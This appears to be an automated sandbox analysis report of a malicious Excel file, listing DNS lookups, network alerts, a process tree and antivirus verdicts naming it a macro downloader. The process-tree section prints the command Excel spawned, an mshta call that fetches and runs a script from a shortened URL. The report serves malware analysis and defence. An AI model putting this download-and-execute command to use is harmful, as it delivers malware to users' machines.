Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 27, 2021, 10:13 p.m. | Oct. 27, 2021, 10:16 p.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
www.bitly.com |
CNAME
bitly.com
|
67.199.248.15 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49173 -> 67.199.248.15:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49172 -> 67.199.248.15:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\~$1.xls |
cmdline | mshta https://www.bitly.com/kddjkodwkwdokdwi |
parent_process | excel.exe | martian_process | mshta https://www.bitly.com/kddjkodwkwdokdwi |
Lionic | Trojan.MSOffice.SLoad.a!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.37870613 |
McAfee | RDN/Generic Downloader.x |
Cyren | X97M/Downldr |
Symantec | CL.Downloader!gen87 |
ESET-NOD32 | a variant of Generik.GCDOHAC |
Avast | SNH:Script [Dropper] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.GenericKD.37870613 |
NANO-Antivirus | Trojan.Ole2.Vbs-heuristic.druvzi |
Tencent | Mac.Trojan.Macrov.Pfte |
Ad-Aware | Trojan.GenericKD.37870613 |
McAfee-GW-Edition | BehavesLike.Downloader.nc |
FireEye | Trojan.GenericKD.37870613 |
Emsisoft | Trojan.GenericKD.37870613 (B) |
Ikarus | Win32.SuspectCrc |
GData | Macro.Trojan.Agent.IZNZ5A |
Avira | HEUR/Macro.Downloader.MRKI.Gen |
Microsoft | TrojanDownloader:O97M/Obfuse.PLM!MTB |
ZoneAlarm | HEUR:Trojan-Downloader.MSOffice.SLoad.gen |
Cynet | Malicious (score: 99) |
MAX | malware (ai score=89) |
Fortinet | VBA/Dloader.MRKI!tr |
AVG | SNH:Script [Dropper] |